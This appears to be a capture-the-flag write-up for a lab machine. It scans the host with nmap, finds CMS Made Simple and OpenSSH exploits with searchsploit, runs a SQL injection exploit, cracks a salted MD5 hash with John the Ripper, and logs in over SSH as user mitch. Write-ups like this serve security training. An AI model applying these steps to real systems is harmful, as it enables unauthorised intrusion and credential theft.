# Nmap 7.91 scan initiated Wed Feb 10 14:41:44 2021 as: nmap -sSVC -p- -oA nmap_full 10.10.168.133 Nmap scan report for 10.10.168.133 Host is up (0.037s latency). Not shown: 65532 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_Can't get directory listing: TIMEOUT | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:10.9.19.77 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 4 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 80/tcp closed http 2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA) | 256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA) |_ 256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (ED25519) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Wed Feb 10 14:44:35 2021 -- 1 IP address (1 host up) scanned in 171.03 seconds
$ searchsploit -s openssh 7.2p2 ----------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ----------------------------------------------------------------------------------- --------------------------------- OpenSSH 7.2p2 - Username Enumeration | linux/remote/40136.py OpenSSHd 7.2p2 - Username Enumeration | linux/remote/40113.txt ----------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results $ searchsploit -p 40136 Exploit: OpenSSH 7.2p2 - Username Enumeration URL: https://www.exploit-db.com/exploits/40136 Path: /usr/share/exploitdb/exploits/linux/remote/40136.py File Type: Python script, ASCII text executable, with CRLF line terminators $ searchsploit -p 40113 Exploit: OpenSSHd 7.2p2 - Username Enumeration URL: https://www.exploit-db.com/exploits/40113 Path: /usr/share/exploitdb/exploits/linux/remote/40113.txt File Type: ASCII text, with CRLF line terminators $ grep CVE- /usr/share/exploitdb/exploits/linux/remote/40113.txt CVE-ID CVE-2016-6210 $ grep CVE- /usr/share/exploitdb/exploits/linux/remote/40136.py # CVEs: CVE-2016-6210 (Credits for this go to Eddie Harari) # Purpose: User name enumeration against SSH daemons affected by CVE-2016-6210. if not args.silent: print("\n\nUser name enumeration against SSH daemons affected by CVE-2016-6210")
But I just understood I weren't supposed to look for a vulnerability targeting the
higher port service but that by "application" the author meant the "web
application".
$ searchsploit -s cms made simple 2.2 ------------------------------------------------------------------------------------ --------------------------------- Exploit Title | Path ------------------------------------------------------------------------------------ --------------------------------- CMS Made Simple 1.2.2 Module TinyMCE - SQL Injection | php/webapps/4810.txt CMS Made Simple < 2.2.10 - SQL Injection | php/webapps/46635.py CMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated) | php/webapps/48779.py CMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload | php/webapps/48742.txt CMS Made Simple 2.2.14 - Persistent Cross-Site Scripting (Authenticated) | php/webapps/48851.txt CMS Made Simple 2.2.15 - RCE (Authenticated) | php/webapps/49345.txt CMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Upload (Authentic | php/webapps/49199.txt CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution | php/webapps/44976.py CMS Made Simple 2.2.7 - (Authenticated) Remote Code Execution | php/webapps/45793.py ------------------------------------------------------------------------------------ --------------------------------- Shellcodes: No Results $ searchsploit -p 46635 Exploit: CMS Made Simple < 2.2.10 - SQL Injection URL: https://www.exploit-db.com/exploits/46635 Path: /usr/share/exploitdb/exploits/php/webapps/46635.py File Type: Python script, ASCII text executable, with CRLF line terminators $ grep CVE- /usr/share/exploitdb/exploits/php/webapps/46635.py
To what kind of vulnerability is the application vulnerable?
Answer:
sqli
See previous steps.
What's the password?
Answer:
secret
Let's use the exploit:
1 2 3 4 5
$ python /usr/share/exploitdb/exploits/php/webapps/46635.py File "/usr/share/exploitdb/exploits/php/webapps/46635.py", line 25 print "[+] Specify an url target" ^ SyntaxError: Missing parentheses in call to 'print'. Did you mean print("[+] Specify an url target")?
It's really a shame to create a python2 exploit in 2019 but let's execute it anyway.
1 2 3 4 5
$ python2 /usr/share/exploitdb/exploits/php/webapps/46635.py Traceback (most recent call last): File "/usr/share/exploitdb/exploits/php/webapps/46635.py", line 12, in <module> from termcolor import colored ImportError: No module named termcolor
Lol, it seems that color was that really required for a PoC exploit to add
a dependency for it. Let's install it:
If we want to crack it ourslef (for the purpose of learning) we can check the
source code of the exploit:
1 2 3 4 5 6 7 8 9 10 11 12 13
defcrack_password(): global password global output global wordlist global salt dict = open(wordlist) for line indict.readlines(): line = line.replace("\n", "") beautify_print_try(line) if hashlib.md5(str(salt) + line).hexdigest() == password: output += "\n[+] Password cracked: " + line break dict.close()
So if we check the extended entries of haiti we can find the corresponding
hashcat or JtR code:
It seems the hash is using this format md5(salt + password).
It's code 20 for hashcat and there is no code for JtR.
There still is a solution for JtR but that has a limitation with the salt size
so let's verify it before.
$ john hash.txt -w=/usr/share/wordlists/passwords/rockyou.txt --format=dynamic_4 Using default input encoding: UTF-8 Loaded 1 password hash (dynamic_4 [md5($s.$p) (OSC) 128/128 AVX 4x3]) Warning: no OpenMP support for this hash type, consider --fork=8 Press 'q' or Ctrl-C to abort, almost any other key for status edited (mitch) 1g 0:00:00:00 DONE (2021-02-10 16:47) 25.00g/s 42000p/s 42000c/s 42000C/s 123456..kenny Use the "--show --format=dynamic_4" options to display all of the cracked passwords reliably Session completed
$ ssh mitch@10.10.168.133 -p 2222 The authenticity of host '[10.10.168.133]:2222 ([10.10.168.133]:2222)' can't be established. ECDSA key fingerprint is SHA256:Fce5J4GBLgx1+iaSMBjO+NFKOjZvL5LOVF5/jc0kwt8. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '[10.10.168.133]:2222' (ECDSA) to the list of known hosts. mitch@10.10.168.133's password: Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-58-generic i686) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 0 packages can be updated. 0 updates are security updates. Last login: Mon Aug 19 18:13:41 2019 from 192.168.0.190 $ id uid=1001(mitch) gid=1001(mitch) groups=1001(mitch)